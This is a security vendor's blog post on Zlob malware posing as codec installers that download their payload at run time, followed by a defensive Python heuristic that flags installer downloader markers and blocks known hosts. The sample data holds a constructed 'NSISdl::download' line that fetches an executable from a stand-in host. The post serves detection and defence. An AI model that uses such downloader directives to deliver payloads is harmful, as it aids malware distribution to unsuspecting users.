Sophos

More Zlob activity

Many of the Zlob samples we see today attempt to trick the user into installing them by masquerading as one or more movie or audio codecs. Unsuspecting users may install these in an attempt to get a video or song to play properly.

Most of the time the Zlob authors simply package their malicious code in a fake codec installer that, to many people, would seem quite legitimate! This hasn't always been effective, since our virus engine is quite capable of detecting the malicious code even when it is packaged inside the installer. However, a new technique is now being employed by the Zlob authors in an attempt to make their malware more adaptable and harder to detect: they are taking advantage of some of the advanced functionality offered by modern setup or install packages, such as NSIS, Wise and InstallShield, namely the ability to install updated setup files directly off the internet.

These packages enable the malware authors to create an innocuous setup wizard for a dummy program, which then downloads the malware from a specified website automatically. Essentially the malware authors are using the setup wizards to download their malware for them!

Fortunately we can attack this on two fronts: we can detect the fake installers with our virus engine, and we can block the download site with our WS1000 (and with our anti-spam products if necessary).
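As an added illustration (not code from the original post or from Sophos) of the two-front approach described above, the following Python script applies a simple static heuristic to an installer blob: it looks for strings that indicate a setup package will fetch files from the internet and extracts any embedded URLs, then checks the URL hosts against a blocklist of known download sites. The installer bytes, the hostname and the blocklist are constructed for the example; the downloader plugin names are given as examples of the kind of marker a scanner might look for, and a real detection would need a much broader set.

```python
import re
from urllib.parse import urlparse

# Constructed sample: a "codec pack" installer whose stub fetches its real
# payload from a remote site instead of carrying it inside the package.
SAMPLE_INSTALLER = (
    b"Nullsoft Install System v2.46\x00"
    b"Video Codec Pack Setup\x00"
    b"NSISdl::download http://codec-update.example.invalid/codec.exe $TEMP\\codec.exe\x00"
    b"Installation complete\x00"
)

# Strings that commonly show an installer will download content at run time
# (NSIS download plugins and the Windows URLDownloadToFile API); illustrative, not exhaustive.
DOWNLOADER_MARKERS = [b"NSISdl::download", b"inetc::get", b"URLDownloadToFile"]

URL_RE = re.compile(rb"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s\x00\"']*)?")


def extract_download_indicators(blob: bytes) -> dict:
    """Return the downloader markers and URLs found in the raw installer bytes."""
    markers = sorted({m.decode() for m in DOWNLOADER_MARKERS if m in blob})
    urls = sorted({u.decode("ascii", "replace") for u in URL_RE.findall(blob)})
    return {"markers": markers, "urls": urls}


def assess(blob: bytes, blocked_hosts: set) -> dict:
    """Combine the file-side heuristic with the network-side blocklist.

    'block'  : the installer points at a host already on the blocklist.
    'review' : it contains a download directive plus a URL, but the host is unknown.
    'allow'  : no sign of a run-time download.
    """
    indicators = extract_download_indicators(blob)
    hosts = {urlparse(u).hostname for u in indicators["urls"]}
    blocked = sorted(h for h in hosts if h in blocked_hosts)
    if blocked:
        verdict = "block"
    elif indicators["markers"] and indicators["urls"]:
        verdict = "review"
    else:
        verdict = "allow"
    return {"verdict": verdict, "blocked_hosts": blocked, **indicators}


if __name__ == "__main__":
    print(assess(SAMPLE_INSTALLER, {"codec-update.example.invalid"}))
```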

This renders this attack almost useless!

